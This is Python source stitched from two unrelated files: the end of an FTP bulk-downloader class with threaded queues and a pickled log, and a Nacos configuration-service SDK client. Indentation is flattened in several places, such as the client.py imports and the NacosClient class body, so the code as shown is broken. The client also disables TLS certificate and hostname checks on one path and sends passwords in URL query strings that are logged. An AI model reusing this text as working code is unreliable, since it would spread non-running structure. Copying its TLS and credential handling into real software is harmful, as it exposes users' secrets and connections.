            self.class_print(remotepath)
            self.class_print(e)
            # the connection may be wedged: open a fresh one and retry
            self.connect_ftp()
            ftp = self._ftp
    # (the original's `if count > 0: ftp.close()` was dead code -- `count`
    # was never incremented -- and has been removed)
    if not successful_get and os.path.exists(file):
        os.remove(file)
    assert successful_get, '{} failed'.format(file)
    self.class_print('successful ftp pull {} seconds'.format(int((pd.Timestamp.now() - start_time).total_seconds())))
    if callable(self.processing_function):
        self.process_q.put((file, remotepath))
def class_print(self, msg):
    """Print *msg* prefixed with a timestamp when ``print_out`` is enabled.

    Uses ``pd.Timestamp.today()``: the original ``pd.datetime`` alias was
    removed in pandas 1.0 and raises AttributeError on modern pandas.
    """
    if self.print_out:
        print(pd.Timestamp.today().strftime('%Y-%m-%d %H:%M:%S') + ' ' + str(msg))
def main(self):
    """Wire up the queues and worker threads, then block until they finish.

    Thread layout:
      glob    -- walks the remote tree and enqueues file paths on self.q
      store   -- downloads queued paths (store_all_ftp)
      process -- optional, runs processing_function on downloaded files
    The loop spins until a worker sets self.join_threads, then joins
    everything and returns.
    """
    self.q = mp.Queue()
    self.process_q = mp.Queue()
    self.connect_ftp()
    # glob_ftp presumably defaults its path argument -- called with no
    # args here; TODO confirm against its definition
    glob_thread = Thread(target=self.glob_ftp, name='glob')
    glob_thread.start()
    store_thread = Thread(target=self.store_all_ftp, name='store')
    store_thread.start()
    if callable(self.processing_function):
        process_thread = Thread(target=self.process_all_ftp, name='process')
        process_thread.start()
    # busy-wait until a worker requests shutdown via self.join_threads
    while True:
        if self.join_threads:
            self.class_print('joining glob thread')
            glob_thread.join()
            self.class_print('joining store thread')
            store_thread.join()
            if callable(self.processing_function):
                self.class_print('joining process thread')
                process_thread.join()
            break
    #self.class_print('END ---- did not join threads ')
def process_all_ftp(self):
    """Consumer loop: run processing_function on each downloaded file.

    Reads (local_file, remote_path) tuples from self.process_q, logs the
    processing outcome keyed by remote path, and on the 'break' sentinel
    (or once count exceeds break_count) flags the whole pipeline for
    shutdown by setting self.join_threads.
    """
    break_count = self.args.get('break_count', np.inf)
    count = 0
    while True:
        fname = self.process_q.get()
        self.class_print('process all ftp finished get {}'.format(fname))
        if fname is None:
            self.class_print('SLEEPING')
            sleep(1)  # nothing to do yet; back off briefly
        elif isinstance(fname[0], str) and fname[0] != 'break':
            count += 1
            # fname is (local_file, remote_path); process the local file,
            # log the result under the remote path
            successful_process = self.processing_function(fname[0])
            self.add_log(fname[1], 'process', successful_process)
            self.class_print(f'process count is {count}')
        elif (isinstance(fname[0], str) and fname[0] == 'break') or (count > break_count):
            self.class_print('JOINING THREADS')
            self.join_threads = True
            return None
def write_log(self, ready=False):
    """Pickle ``self.log_data`` to ``self.log``, creating its directory.

    Parameters
    ----------
    ready : bool
        When True, set the '_ready' flag so other FTP instances know
        this run has finished (see read_log).

    Notes
    -----
    Fixes a NameError in the original: ``ready`` was read but never
    defined anywhere; it is now an explicit keyword argument, matching
    the existing call sites ``write_log()`` and ``write_log(ready=True)``.
    The pickle file handle is also now closed deterministically.
    """
    fp = self.log
    log_dir = os.path.dirname(fp)
    if not os.path.exists(log_dir):
        os.makedirs(log_dir)
    if ready:
        self.log_data['_ready'] = True
    with open(self.log, mode='wb') as fh:
        pickle.dump(self.log_data, fh)
def add_log(self, fp, key, value):
    """Record *key* -> *value* for file *fp* in the in-memory log."""
    entry = self.log_data.setdefault(fp, {})
    entry[key] = value
def read_log(self):
    """Load the pickled download log, waiting out concurrent runs.

    The '_ready' flag doubles as a crude inter-process lock: another FTP
    instance clears it while it is running, so we poll once a minute
    until it is True (or self._force is set), then immediately clear it
    ourselves via write_log() to claim the log.
    """
    if self.log is None:
        self.log_data = {}
    elif os.path.exists(self.log):
        first = True
        while True:
            # NOTE(review): the file handle from open() is never closed
            # explicitly; relies on GC
            self.log_data = pickle.load(open(self.log, mode='rb'))
            if self._force or self.log_data.get('_ready', True):
                # this section prevents other FTPs from downloading while this one is running so your log is not double written
                self.log_data['_ready'] = False
                self.write_log()
                break
            else:
                if first:
                    first = False
                    self.class_print('sleeping ftp in process of running')
                sleep(60)
    else:
        self.log_data = {}
    self.class_print('finished reading log')
def __init__(
    self,
    base_url,
    username=None,
    password=None,
    port=21,
    store=None,
    processing_function=None,
    log=None,
    blocks=None,
    start_date=pd.to_datetime('1970-01-01'),
    end_date=None,
    blocksize=8192,
    **args,
):
    '''
    Parameters
    ----------
    base_url : str
        URL that you are pulling the ftp
    username : str
        Username to login to the ftp
    password : str
        Password to login to the ftp
    port : int
        port
    store : None, str
        Path after to store files. If None, then
        stores in a temporary directory. Use with
        1) processing_function argument to get
        data from them and a log filepath to keep
        track of files already downloaded
    processing_function : None/function
        pass function if you want to process the
        data after ftp pull. Takes the filepath as an
        argument. Returns True/False depending on whether
        the process ran correctly
    log : str
        filepath of log to get information on data.
        This can be used for a temporary directory
        in order to not keep the files stored but
        know that the data is processed. Should be
        a .p file
    blocks : list
        list of str to block. Looks for string
        in file path of each entry in blocks
        to determine whether to pull
    start_date : str/datetime
        date to only pull files that were modified after
        this date - default 1970-01-01
    end_date : str/datetime/None
        only pull files modified before this date. Defaults to
        tomorrow, computed per call (the old default was evaluated
        once at class-definition time and went stale in long-lived
        processes; it also used pd.datetime, removed in pandas 1.0)

    Optional Args
    -------------
    print_out : bool
        Whether to print out messages (slower when True)
    break_count : int
        stop running ftp download after n number of files downloaded
    force : bool
        force to overwrite log that is in progress
    '''
    self.args = args
    self._glob_count = 0
    self.print_out = args.get('print_out', False)
    self._force = args.get('force', False)
    # avoid the shared-mutable-default pitfall and accept a bare string
    if blocks is None:
        blocks = []
    elif isinstance(blocks, str):
        blocks = [blocks]
    self.blocks = blocks
    if store is not None:
        self.class_print(f'store is not None: {store}')
        self._output_path = store
        self.close_temporary_directory = False
    else:
        # no store given: download into a temp dir we clean up afterwards
        self.close_temporary_directory = True
        self.tmpdir = tempfile.TemporaryDirectory()
        self._output_path = self.tmpdir.name
        self.class_print(f'temporary directory {self._output_path}')
    self._blocksize = blocksize
    self.log = log
    self.read_log()
    self.join_threads = False
    self._username = username
    self._password = password
    self._port = port
    self._base_url = base_url
    self.processing_function = processing_function
    self.file_list = []
    self.orig_store_paths = ''
    self.start_date = pd.to_datetime(start_date)
    if end_date is None:
        end_date = pd.Timestamp.today() + dt.timedelta(1)
    self.end_date = pd.to_datetime(end_date)
    # the constructor kicks off the whole pipeline immediately
    self.run()
    if log is not None:
        self.write_log(ready=True)
def run(self):
    """Execute the download pipeline end-to-end, then release resources."""
    self.main()
    self.cleanup()
client.py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
import base64
import hashlib
import logging
import socket
import json
import platform
import time
import hmac
try:
import ssl
except ImportError:
ssl = None
from multiprocessing import Process, Manager, Queue, pool
from threading import RLock, Thread
try:
# python3.6
from http import HTTPStatus
from urllib.request import Request, urlopen, ProxyHandler, HTTPSHandler, HTTPHandler, build_opener
from urllib.parse import urlencode, unquote_plus, quote
from urllib.error import HTTPError, URLError
except ImportError:
# python2.7
import httplib as HTTPStatus
from urllib2 import Request, urlopen, HTTPError, URLError, ProxyHandler, HTTPSHandler, build_opener
from urllib import urlencode, unquote_plus, quote
base64.encodebytes = base64.encodestring
from .commons import synchronized_with_attr, truncate, python_version_bellow
from .params import group_key, parse_key, is_valid
from .files import read_file_str, save_file, delete_file
from .exception import NacosException, NacosRequestException
from .listener import Event, SimpleListenerManager
from .timer import NacosTimer, NacosTimerManager
logging.basicConfig()
logger = logging.getLogger(__name__)
DEBUG = False
DEFAULT_GROUP_NAME = "DEFAULT_GROUP"
DEFAULT_NAMESPACE = ""
WORD_SEPARATOR = u'\x02'
LINE_SEPARATOR = u'\x01'
DEFAULTS = {
"APP_NAME": "Nacos-SDK-Python",
"TIMEOUT": 10, # in seconds
"PULLING_TIMEOUT": 30, # in seconds
"PULLING_CONFIG_SIZE": 3000,
"CALLBACK_THREAD_NUM": 10,
"FAILOVER_BASE": "nacos-data/data",
"SNAPSHOT_BASE": "nacos-data/snapshot",
}
OPTIONS = {"default_timeout", "pulling_timeout", "pulling_config_size", "callback_thread_num", "failover_base",
"snapshot_base", "no_snapshot", "proxies"}
def process_common_config_params(data_id, group):
    """Normalize and validate a (data_id, group) pair.

    A blank/whitespace group falls back to DEFAULT_GROUP_NAME; both
    values must pass is_valid, otherwise NacosException is raised.
    """
    group = group.strip() if group and group.strip() else DEFAULT_GROUP_NAME
    if not data_id or not is_valid(data_id):
        raise NacosException("Invalid dataId.")
    if not is_valid(group):
        raise NacosException("Invalid group.")
    return data_id, group
def parse_pulling_result(result):
    """Decode a long-polling response body into [dataId, group, tenant] triples.

    The server separates records with LINE_SEPARATOR and fields with
    WORD_SEPARATOR; records missing the tenant field are padded with "".
    An empty body yields an empty list.
    """
    if not result:
        return list()
    parsed = list()
    for record in unquote_plus(result.decode()).split(LINE_SEPARATOR):
        if not record.strip():
            continue
        fields = record.split(WORD_SEPARATOR)
        if len(fields) < 3:
            fields.append("")
        parsed.append(fields)
    return parsed
class WatcherWrap:
    """Pairs a watch callback with the md5 of the last content it saw."""

    def __init__(self, key, callback, last_md5=None):
        self.watch_key = key
        self.callback = callback
        self.last_md5 = last_md5
class CacheData:
    """Per-key pulling state: last known content plus its md5.

    Seeds itself from the failover directory (preferred) or the local
    snapshot, so the first long-poll can report a meaningful md5.
    """

    def __init__(self, key, client):
        self.key = key
        seed = read_file_str(client.failover_base, key) or read_file_str(client.snapshot_base, key)
        self.content = seed
        self.md5 = hashlib.md5(seed.encode("UTF-8")).hexdigest() if seed else None
        self.is_init = True
        if not self.md5:
            logger.debug("[init-cache] cache for %s does not have local value" % key)
class SubscribedLocalInstance(object):
    """Snapshot of one subscribed service instance plus an md5 fingerprint."""

    def __init__(self, key, instance):
        self.key = key
        self.instance = instance
        self.instance_id = instance["instanceId"]
        self.md5 = NacosClient.get_md5(str(instance))
class SubscribedLocalManager(object):
    """In-memory registry of subscribed instances and their listener managers.

    ``self.manager`` maps a subscription key to a node of the form::

        {"LOCAL_INSTANCES": {instance_id: SubscribedLocalInstance, ...},
         "LISTENER_MANAGER": SimpleListenerManager}
    """

    def __init__(self):
        self.manager = {}

    def do_listener_launch(self, key, event, slc):
        """Fire *event* for *slc* on the key's listener manager, if one exists."""
        listener_manager = self.get_local_listener_manager(key)
        if listener_manager and isinstance(listener_manager, SimpleListenerManager):
            listener_manager.do_launch(event, slc)

    def get_local_listener_manager(self, key):
        """Return the listener manager registered for *key*, or None."""
        key_node = self.manager.get(key)
        if not key_node:
            return None
        return key_node.get("LISTENER_MANAGER")

    def add_local_listener(self, key, listener_fn):
        """Register listener callback(s) for *key*, creating the manager lazily.

        *listener_fn* may be a single callable, a list, or a tuple.
        """
        if not self.manager.get(key):
            self.manager[key] = {}
        local_listener_manager = self.manager.get(key).get("LISTENER_MANAGER")
        if not local_listener_manager or not isinstance(local_listener_manager, SimpleListenerManager):
            self.manager.get(key)["LISTENER_MANAGER"] = SimpleListenerManager()
            local_listener_manager = self.manager.get(key).get("LISTENER_MANAGER")
        if not local_listener_manager:
            return self
        # BUGFIX: the original converted a list to a tuple, added the
        # listeners, then fell into the tuple branch and added them all a
        # second time; normalize once and add once instead.
        if isinstance(listener_fn, list):
            listener_fn = tuple(listener_fn)
        if isinstance(listener_fn, tuple):
            local_listener_manager.add_listeners(*listener_fn)
        # just single listener function
        else:
            local_listener_manager.add_listener(listener_fn)
        return self

    def add_local_listener_manager(self, key, listener_manager):
        """Attach a pre-built listener manager to *key*."""
        key_node = self.manager.get(key)
        if key_node is None:
            # BUGFIX: the original created a fresh dict here but never
            # stored it back, so the manager was silently dropped for
            # previously-unknown keys.
            key_node = {}
            self.manager[key] = key_node
        key_node["LISTENER_MANAGER"] = listener_manager
        return self

    def get_local_instances(self, key):
        """Return the {instance_id: instance} map for *key*, or None."""
        if not self.manager.get(key):
            return None
        return self.manager.get(key).get("LOCAL_INSTANCES")

    def add_local_instance(self, slc):
        """Insert or overwrite *slc* under its key and instance id."""
        if not self.manager.get(slc.key):
            self.manager[slc.key] = {}
        if not self.manager.get(slc.key).get('LOCAL_INSTANCES'):
            self.manager.get(slc.key)['LOCAL_INSTANCES'] = {}
        self.manager.get(slc.key)['LOCAL_INSTANCES'][slc.instance_id] = slc
        return self

    def remove_local_instance(self, slc):
        """Drop *slc* from its key's instance map; missing entries are ignored."""
        key_node = self.manager.get(slc.key)
        if not key_node:
            return self
        local_instances_node = key_node.get("LOCAL_INSTANCES")
        if not local_instances_node:
            return self
        local_instance = local_instances_node.get(slc.instance_id)
        if not local_instance:
            return self
        local_instances_node.pop(slc.instance_id)
        return self
def parse_nacos_server_addr(server_addr):
    """Split 'host[:port]' (or 'scheme://host:port') into (address, port).

    Three colon-separated pieces mean a scheme-qualified address, so the
    first two are rejoined; a missing port defaults to 8848.
    """
    pieces = server_addr.split(":")
    if len(pieces) == 3:
        return ":".join(pieces[:2]), int(pieces[2])
    host = pieces[0]
    port = int(pieces[1]) if len(pieces) > 1 else 8848
    return host, port
class NacosClient:
debug = False
@staticmethod
def set_debugging():
    """Attach a DEBUG-level stream handler to the module logger (idempotent)."""
    if NacosClient.debug:
        return
    global logger
    logger = logging.getLogger("nacos")
    handler = logging.StreamHandler()
    handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(name)s:%(message)s"))
    logger.addHandler(handler)
    logger.setLevel(logging.DEBUG)
    NacosClient.debug = True
@staticmethod
def get_md5(content):
return hashlib.md5(content.encode("UTF-8")).hexdigest() if content is not None else None
def __init__(self, server_addresses, endpoint=None, namespace=None, ak=None, sk=None, username=None, password=None, no_snapshot=False):
    """Build a client for a comma-separated list of server addresses.

    Bad addresses are logged and re-raised; all tunables start from the
    DEFAULTS table and can be overridden later via set_options().
    """
    try:
        self.server_list = [parse_nacos_server_addr(addr.strip())
                            for addr in server_addresses.split(",")]
    except Exception as ex:
        logger.exception("[init] bad server address for %s" % server_addresses)
        raise ex
    self.current_server = self.server_list[0]
    # identity / auth
    self.endpoint = endpoint
    self.namespace = namespace or DEFAULT_NAMESPACE or ""
    self.ak = ak
    self.sk = sk
    self.username = username
    self.password = password
    self.auth_enabled = self.ak and self.sk
    self.cai_enabled = True
    # server rotation state
    self.server_list_lock = RLock()
    self.server_offset = 0
    # config-watch machinery (lazily built by _init_pulling)
    self.watcher_mapping = dict()
    self.subscribed_local_manager = SubscribedLocalManager()
    self.subscribe_timer_manager = NacosTimerManager()
    self.pulling_lock = RLock()
    self.puller_mapping = None
    self.notify_queue = None
    self.callback_tread_pool = None
    self.process_mgr = None
    # tunables (see set_options)
    self.default_timeout = DEFAULTS["TIMEOUT"]
    self.pulling_timeout = DEFAULTS["PULLING_TIMEOUT"]
    self.pulling_config_size = DEFAULTS["PULLING_CONFIG_SIZE"]
    self.callback_thread_num = DEFAULTS["CALLBACK_THREAD_NUM"]
    self.failover_base = DEFAULTS["FAILOVER_BASE"]
    self.snapshot_base = DEFAULTS["SNAPSHOT_BASE"]
    self.no_snapshot = no_snapshot
    self.proxies = None
    logger.info("[client-init] endpoint:%s, tenant:%s" % (endpoint, namespace))
def set_options(self, **kwargs):
    """Apply recognized option overrides; unknown keys are logged and skipped."""
    for key, value in kwargs.items():
        if key not in OPTIONS:
            logger.debug("[set_options] unknown option:%s, ignored" % key)
            continue
        logger.debug("[set_options] key:%s, value:%s" % (key, value))
        setattr(self, key, value)
def change_server(self):
with self.server_list_lock:
self.server_offset = (self.server_offset + 1) % len(self.server_list)
self.current_server = self.server_list[self.server_offset]
def get_server(self):
    """Return the (address, port) tuple currently selected for requests."""
    current = self.current_server
    logger.info("[get-server] use server:%s" % str(current))
    return current
def remove_config(self, data_id, group, timeout=None):
    """Delete a config entry from the server.

    Parameters
    ----------
    data_id, group : str
        Config coordinates; group falls back to the default when blank.
    timeout : float or None
        Per-request timeout; defaults to self.default_timeout.

    Returns
    -------
    bool
        True when the server acknowledges with the literal b"true".

    Raises
    ------
    NacosException
        On HTTP 403 (insufficient privilege) or any other HTTP error.
    """
    data_id, group = process_common_config_params(data_id, group)
    logger.info(
        "[remove] data_id:%s, group:%s, namespace:%s, timeout:%s" % (data_id, group, self.namespace, timeout))
    params = {
        "dataId": data_id,
        "group": group,
    }
    if self.namespace:
        # "tenant" is how the server API spells namespace
        params["tenant"] = self.namespace
    try:
        resp = self._do_sync_req("/nacos/v1/cs/configs", None, None, params,
                                 timeout or self.default_timeout, "DELETE")
        c = resp.read()
        logger.info("[remove] remove group:%s, data_id:%s, server response:%s" % (
            group, data_id, c))
        return c == b"true"
    except HTTPError as e:
        if e.code == HTTPStatus.FORBIDDEN:
            logger.error(
                "[remove] no right for namespace:%s, group:%s, data_id:%s" % (self.namespace, group, data_id))
            raise NacosException("Insufficient privilege.")
        else:
            logger.error("[remove] error code [:%s] for namespace:%s, group:%s, data_id:%s" % (
                e.code, self.namespace, group, data_id))
            raise NacosException("Request Error, code is %s" % e.code)
    except Exception as e:
        logger.exception("[remove] exception %s occur" % str(e))
        raise
def publish_config(self, data_id, group, content, app_name=None, config_type=None, timeout=None):
    """Create or update a config entry on the server.

    Parameters
    ----------
    data_id, group : str
        Config coordinates.
    content : str or bytes
        New config body; bytes are decoded as UTF-8.  None is rejected
        (use remove_config to delete).
    app_name, config_type : str, optional
        Extra attributes forwarded to the server when given.
    timeout : float or None
        Per-request timeout; defaults to self.default_timeout.

    Returns
    -------
    bool
        True when the server acknowledges with b"true".

    Raises
    ------
    NacosException
        For None content, HTTP 403, or any other HTTP error.
    """
    if content is None:
        raise NacosException("Can not publish none content, use remove instead.")
    data_id, group = process_common_config_params(data_id, group)
    if type(content) == bytes:
        content = content.decode("UTF-8")
    logger.info("[publish] data_id:%s, group:%s, namespace:%s, content:%s, timeout:%s" % (
        data_id, group, self.namespace, truncate(content), timeout))
    params = {
        "dataId": data_id,
        "group": group,
        "content": content.encode("UTF-8"),
    }
    if self.namespace:
        params["tenant"] = self.namespace
    if app_name:
        params["appName"] = app_name
    if config_type:
        params["type"] = config_type
    try:
        resp = self._do_sync_req("/nacos/v1/cs/configs", None, None, params,
                                 timeout or self.default_timeout, "POST")
        c = resp.read()
        logger.info("[publish] publish content, group:%s, data_id:%s, server response:%s" % (
            group, data_id, c))
        return c == b"true"
    except HTTPError as e:
        if e.code == HTTPStatus.FORBIDDEN:
            raise NacosException("Insufficient privilege.")
        else:
            raise NacosException("Request Error, code is %s" % e.code)
    except Exception as e:
        logger.exception("[publish] exception %s occur" % str(e))
        raise
def get_config(self, data_id, group, timeout=None, no_snapshot=None):
    """Fetch a config value, with local failover and snapshot fallback.

    Lookup order:
      1. failover directory (manual override) -- returned as-is when present;
      2. the server, saving a snapshot on success;
      3. the local snapshot, when the server is unreachable.

    Parameters
    ----------
    data_id, group : str
        Config coordinates.
    timeout : float or None
        Per-request timeout; defaults to self.default_timeout.
    no_snapshot : bool or None
        When True, skip snapshot read/write entirely and re-raise server
        errors; None falls back to the instance default.

    Returns
    -------
    str or None
        Config content, or None when the server reports 404.
    """
    no_snapshot = self.no_snapshot if no_snapshot is None else no_snapshot
    data_id, group = process_common_config_params(data_id, group)
    logger.info("[get-config] data_id:%s, group:%s, namespace:%s, timeout:%s" % (
        data_id, group, self.namespace, timeout))
    params = {
        "dataId": data_id,
        "group": group,
    }
    if self.namespace:
        params["tenant"] = self.namespace
    cache_key = group_key(data_id, group, self.namespace)
    # get from failover
    content = read_file_str(self.failover_base, cache_key)
    if content is None:
        logger.debug("[get-config] failover config is not exist for %s, try to get from server" % cache_key)
    else:
        logger.debug("[get-config] get %s from failover directory, content is %s" % (cache_key, truncate(content)))
        return content
    # get from server
    try:
        resp = self._do_sync_req("/nacos/v1/cs/configs", None, params, None, timeout or self.default_timeout)
        content = resp.read().decode("UTF-8")
    except HTTPError as e:
        if e.code == HTTPStatus.NOT_FOUND:
            logger.debug(
                "[get-config] config not found for data_id:%s, group:%s, namespace:%s, try to delete snapshot" % (
                    data_id, group, self.namespace))
            # 404 means the config was deleted server-side: drop any stale snapshot
            delete_file(self.snapshot_base, cache_key)
            return None
        elif e.code == HTTPStatus.CONFLICT:
            logger.error(
                "[get-config] config being modified concurrently for data_id:%s, group:%s, namespace:%s" % (
                    data_id, group, self.namespace))
        elif e.code == HTTPStatus.FORBIDDEN:
            logger.error("[get-config] no right for data_id:%s, group:%s, namespace:%s" % (
                data_id, group, self.namespace))
            raise NacosException("Insufficient privilege.")
        else:
            logger.error("[get-config] error code [:%s] for data_id:%s, group:%s, namespace:%s" % (
                e.code, data_id, group, self.namespace))
        if no_snapshot:
            raise
    except Exception as e:
        logger.exception("[get-config] exception %s occur" % str(e))
        if no_snapshot:
            raise
    if no_snapshot:
        return content
    if content is not None:
        logger.info(
            "[get-config] content from server:%s, data_id:%s, group:%s, namespace:%s, try to save snapshot" % (
                truncate(content), data_id, group, self.namespace))
        try:
            save_file(self.snapshot_base, cache_key, content)
        except Exception as e:
            # NOTE(review): the placeholder labels and argument order look
            # misaligned here ("for %s" receives data_id, "namespace"
            # receives the exception) -- left untouched.
            logger.exception("[get-config] save snapshot failed for %s, data_id:%s, group:%s, namespace:%s" % (
                data_id, group, self.namespace, str(e)))
        return content
    logger.error("[get-config] get config from server failed, try snapshot, data_id:%s, group:%s, namespace:%s" % (
        data_id, group, self.namespace))
    content = read_file_str(self.snapshot_base, cache_key)
    if content is None:
        logger.debug("[get-config] snapshot is not exist for %s." % cache_key)
    else:
        logger.debug("[get-config] get %s from snapshot directory, content is %s" % (cache_key, truncate(content)))
    return content
def get_configs(self, timeout=None, no_snapshot=None, group="", page_no=1, page_size=1000):
    """List configs in the namespace (paged), with failover/snapshot fallback.

    Mirrors get_config(): failover dir first, then the server (saving a
    namespace-level snapshot plus one per-item snapshot), then snapshot.

    Returns
    -------
    dict
        Parsed server response (contains 'pageItems').
    """
    no_snapshot = self.no_snapshot if no_snapshot is None else no_snapshot
    logger.info("[get-configs] namespace:%s, timeout:%s, group:%s, page_no:%s, page_size:%s" % (
        self.namespace, timeout, group, page_no, page_size))
    params = {
        "dataId": "",
        "group": group,
        "search": "accurate",
        "pageNo": page_no,
        "pageSize": page_size,
    }
    if self.namespace:
        params["tenant"] = self.namespace
    # namespace-level cache key (empty data_id/group)
    cache_key = group_key("", "", self.namespace)
    # get from failover
    content = read_file_str(self.failover_base, cache_key)
    if content is None:
        logger.debug("[get-config] failover config is not exist for %s, try to get from server" % cache_key)
    else:
        logger.debug("[get-config] get %s from failover directory, content is %s" % (cache_key, truncate(content)))
        return json.loads(content)
    # get from server
    try:
        resp = self._do_sync_req("/nacos/v1/cs/configs", None, params, None, timeout or self.default_timeout)
        content = resp.read().decode("UTF-8")
    except HTTPError as e:
        if e.code == HTTPStatus.CONFLICT:
            logger.error(
                "[get-configs] configs being modified concurrently for namespace:%s" % self.namespace)
        elif e.code == HTTPStatus.FORBIDDEN:
            logger.error("[get-configs] no right for namespace:%s" % self.namespace)
            raise NacosException("Insufficient privilege.")
        else:
            logger.error("[get-configs] error code [:%s] for namespace:%s" % (e.code, self.namespace))
        if no_snapshot:
            raise
    except Exception as e:
        logger.exception("[get-config] exception %s occur" % str(e))
        if no_snapshot:
            raise
    if no_snapshot:
        return json.loads(content)
    if content is not None:
        logger.info(
            "[get-configs] content from server:%s, namespace:%s, try to save snapshot" % (
                truncate(content), self.namespace))
        try:
            save_file(self.snapshot_base, cache_key, content)
            # also snapshot each individual item so get_config() can fall
            # back to it later
            for item in json.loads(content).get("pageItems"):
                data_id = item.get('dataId')
                group = item.get('group')
                item_content = item.get('content')
                item_cache_key = group_key(data_id, group, self.namespace)
                save_file(self.snapshot_base, item_cache_key, item_content)
        except Exception as e:
            logger.exception("[get-configs] save snapshot failed for %s, namespace:%s" % (
                str(e), self.namespace))
        return json.loads(content)
    logger.error("[get-configs] get config from server failed, try snapshot, namespace:%s" % self.namespace)
    content = read_file_str(self.snapshot_base, cache_key)
    if content is None:
        logger.debug("[get-configs] snapshot is not exist for %s." % cache_key)
    else:
        logger.debug("[get-configs] get %s from snapshot directory, content is %s" % (cache_key, truncate(content)))
    return json.loads(content)
@synchronized_with_attr("pulling_lock")
def add_config_watcher(self, data_id, group, cb, content=None):
cache_key = group_key(data_id, group, self.namespace)
if not self.watcher_mapping.get(cache_key):
self.add_config_watchers(data_id, group, [cb], content)
@synchronized_with_attr("pulling_lock")
def add_config_watchers(self, data_id, group, cb_list, content=None):
if not cb_list:
raise NacosException("A callback function is needed.")
data_id, group = process_common_config_params(data_id, group)
logger.info("[add-watcher] data_id:%s, group:%s, namespace:%s" % (data_id, group, self.namespace))
cache_key = group_key(data_id, group, self.namespace)
wl = self.watcher_mapping.get(cache_key)
if not wl:
wl = list()
self.watcher_mapping[cache_key] = wl
if not content:
content = self.get_config(data_id, group)
last_md5 = NacosClient.get_md5(content)
for cb in cb_list:
wl.append(WatcherWrap(cache_key, cb, last_md5))
logger.info("[add-watcher] watcher has been added for key:%s, new callback is:%s, callback number is:%s" % (
cache_key, cb.__name__, len(wl)))
if self.puller_mapping is None:
logger.debug("[add-watcher] pulling should be initialized")
self._init_pulling()
if cache_key in self.puller_mapping:
logger.debug("[add-watcher] key:%s is already in pulling" % cache_key)
return
for key, puller_info in self.puller_mapping.items():
if len(puller_info[1]) < self.pulling_config_size:
logger.debug("[add-watcher] puller:%s is available, add key:%s" % (puller_info[0], cache_key))
puller_info[1].append(cache_key)
self.puller_mapping[cache_key] = puller_info
break
else:
logger.debug("[add-watcher] no puller available, new one and add key:%s" % cache_key)
key_list = self.process_mgr.list()
key_list.append(cache_key)
sys_os = platform.system()
if sys_os == 'Windows':
puller = Thread(target=self._do_pulling, args=(key_list, self.notify_queue))
puller.setDaemon(True)
else:
puller = Process(target=self._do_pulling, args=(key_list, self.notify_queue))
puller.daemon = True
puller.start()
self.puller_mapping[cache_key] = (puller, key_list)
@synchronized_with_attr("pulling_lock")
def remove_config_watcher(self, data_id, group, cb, remove_all=False):
if not cb:
raise NacosException("A callback function is needed.")
data_id, group = process_common_config_params(data_id, group)
if not self.puller_mapping:
logger.debug("[remove-watcher] watcher is never started.")
return
cache_key = group_key(data_id, group, self.namespace)
wl = self.watcher_mapping.get(cache_key)
if not wl:
logger.debug("[remove-watcher] there is no watcher on key:%s" % cache_key)
return
wrap_to_remove = list()
for i in wl:
if i.callback == cb:
wrap_to_remove.append(i)
if not remove_all:
break
for i in wrap_to_remove:
wl.remove(i)
logger.info("[remove-watcher] %s is removed from %s, remove all:%s" % (cb.__name__, cache_key, remove_all))
if not wl:
logger.debug("[remove-watcher] there is no watcher for:%s, kick out from pulling" % cache_key)
self.watcher_mapping.pop(cache_key)
puller_info = self.puller_mapping[cache_key]
puller_info[1].remove(cache_key)
if not puller_info[1]:
logger.debug("[remove-watcher] there is no pulling keys for puller:%s, stop it" % puller_info[0])
self.puller_mapping.pop(cache_key)
if isinstance(puller_info[0], Process):
puller_info[0].terminate()
def _do_sync_req(self, url, headers=None, params=None, data=None, timeout=None, method="GET"):
    """Issue one HTTP request, rotating through servers on failure.

    Parameters
    ----------
    url : str
        Server-relative path (query string is appended from *params*).
    headers, params, data : dict or None
        Request headers, query parameters, and form body.
    timeout : float or None
        Socket timeout per attempt.
    method : str
        HTTP verb.

    Returns
    -------
    The urlopen response object.

    Raises
    ------
    NacosRequestException
        When every server in server_list has been tried without success.
    HTTPError
        For non-retryable HTTP status codes.
    """
    if self.username and self.password:
        if not params:
            params = {}
        params.update({"username": self.username, "password": self.password})
    url = "?".join([url, urlencode(params)]) if params else url
    all_headers = self._get_common_headers(params, data)
    if headers:
        all_headers.update(headers)
    logger.debug(
        "[do-sync-req] url:%s, headers:%s, params:%s, data:%s, timeout:%s" % (
            url, all_headers, params, data, timeout))
    tries = 0
    while True:
        try:
            server_info = self.get_server()
            if not server_info:
                logger.error("[do-sync-req] can not get one server.")
                raise NacosRequestException("Server is not available.")
            address, port = server_info
            server = ":".join([address, str(port)])
            server_url = server
            if not server_url.startswith("http"):
                server_url = "%s://%s" % ("http", server)
            if python_version_bellow("3"):
                # python2: Request has no method kwarg; patch get_method
                req = Request(url=server_url + url, data=urlencode(data).encode() if data else None,
                              headers=all_headers)
                req.get_method = lambda: method
                ctx = ssl.create_default_context()
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE
            else:
                req = Request(url=server_url + url, data=urlencode(data).encode() if data else None,
                              headers=all_headers, method=method)
                ctx = ssl.SSLContext()
            # build a new opener that adds proxy setting so that http request go through the proxy
            if self.proxies:
                proxy_support = ProxyHandler(self.proxies)
                if 'https://' in server_url:
                    opener = build_opener(proxy_support, HTTPSHandler(context=ctx))
                else:
                    # BUGFIX: the original assigned a bare HTTPHandler()
                    # here, which has no .open(); it must be wrapped in an
                    # opener via build_opener().
                    opener = build_opener(proxy_support, HTTPHandler())
                resp = opener.open(req, timeout=timeout)
            else:
                if 'https://' in server_url:
                    resp = urlopen(req, timeout=timeout, context=ctx)
                else:
                    resp = urlopen(req, timeout=timeout)
            logger.debug("[do-sync-req] info from server:%s" % server)
            return resp
        except HTTPError as e:
            # only gateway-style errors are worth retrying on another server
            if e.code in [HTTPStatus.INTERNAL_SERVER_ERROR, HTTPStatus.BAD_GATEWAY,
                          HTTPStatus.SERVICE_UNAVAILABLE]:
                logger.debug("[do-sync-req] server:%s is not available for reason:%s" % (server, e.msg))
            else:
                raise
        except socket.timeout:
            logger.debug("[do-sync-req] %s request timeout" % server)
        except URLError as e:
            logger.debug("[do-sync-req] %s connection error:%s" % (server, e.reason))
        tries += 1
        if tries >= len(self.server_list):
            logger.error("[do-sync-req] %s maybe down, no server is currently available" % server)
            raise NacosRequestException("All server are not available")
        self.change_server()
